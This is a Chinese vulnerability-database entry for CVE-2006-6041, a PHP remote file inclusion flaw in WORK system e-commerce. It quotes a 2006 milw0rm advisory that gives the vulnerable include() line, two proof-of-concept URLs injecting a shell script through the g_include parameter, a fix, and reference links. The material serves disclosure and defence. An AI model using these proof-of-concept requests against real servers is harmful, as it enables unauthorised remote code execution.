Laurent Van den Reysen WORK system e-commerce 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111512 漏洞类型 代码注入
发布时间 2006-11-10 更新时间 2006-11-21
CVE编号 CVE-2006-6041 CNNVD-ID CNNVD-200611-336
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2752
https://www.securityfocus.com/bid/87339
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-336
|漏洞详情
LaurentVandenReysenWORKsysteme-commerce存在多个PHP远程文件包含漏洞,远程攻击者可通过传给在module/内的(1)index.php,(2)module/forum/forum.php,(3)未明文件和(4)在administration/module/下的未明文件的g_include参数中的URL,来执行任意PHP代码。
|漏洞EXP
============================================================================================

WORK System E-Commerce (g_include) Remote File Inclusion Vulnerability

============================================================================================

Product............: WORK system e-commerce
Affected versions..: worksystem <= 3.0.1
Security Risk......: High
Vendor.............: Laurent Van den Reysen (http://worksystem.sourceforge.net/)
Product Link.......: http://prdownloads.sourceforge.net/worksystem/worksystem_3_0_1.zip?download
Discovered by......: SlimTim10


Details:
---------
Many files (including index.php) use the include() function with a variable that can be
altered remotely.

Vulnerable Code:
-----------------
include ($g_include."<file>.inc");

Vulnerable Files:
------------------
'index.php' (main directory) along with many files in the './administration/module' and
'./module' directories.

Proof of Concept:
------------------
http://[host]/work/index.php?g_include=[shell_script]
http://[host]/work/module/forum/forum.php?g_include=[shell_script]

Solution:
----------
No patch has been provided. The vulnerable files can be manually edited to initialize the
$g_include variable.

============================================================================================

Shoutz: Anonymous bro, Magnetosphere, dw0rek, c4p_sl0ck, str0ke!
SlimTim10 <slimtim10[at]gmail[dot]com>

============================================================================================

# milw0rm.com [2006-11-10]
|受影响的产品
Laurent Van den Reysen Work System E-Commerce 3.0.2
|参考资料

来源:BUGTRAQ
名称:20061213Re:worksystem=>RemoteFileIncludeVulnerabilityExploit
链接:http://www.securityfocus.com/archive/1/archive/1/454269/100/0/threaded
来源:BUGTRAQ
名称:20061116worksystem=>RemoteFileIncludeVulnerabilityExploit
链接:http://www.securityfocus.com/archive/1/archive/1/451860/100/200/threaded
来源:MILW0RM
名称:2752
链接:http://www.milw0rm.com/exploits/2752
来源:VUPEN
名称:ADV-2006-4582
链接:http://www.frsirt.com/english/advisories/2006/4582
来源:SECTRACK
名称:1017249
链接:http://securitytracker.com/id?1017249
来源:SECUNIA
名称:22963
链接:http://secunia.com/advisories/22963
来源:XF
名称:worksystem-indexforum-file-include(30199)
链接:http://xforce.iss.net/xforce/xfdb/30199
来源:MILW0RM
名称:2752
链接:http://milw0rm.com/exploits/2752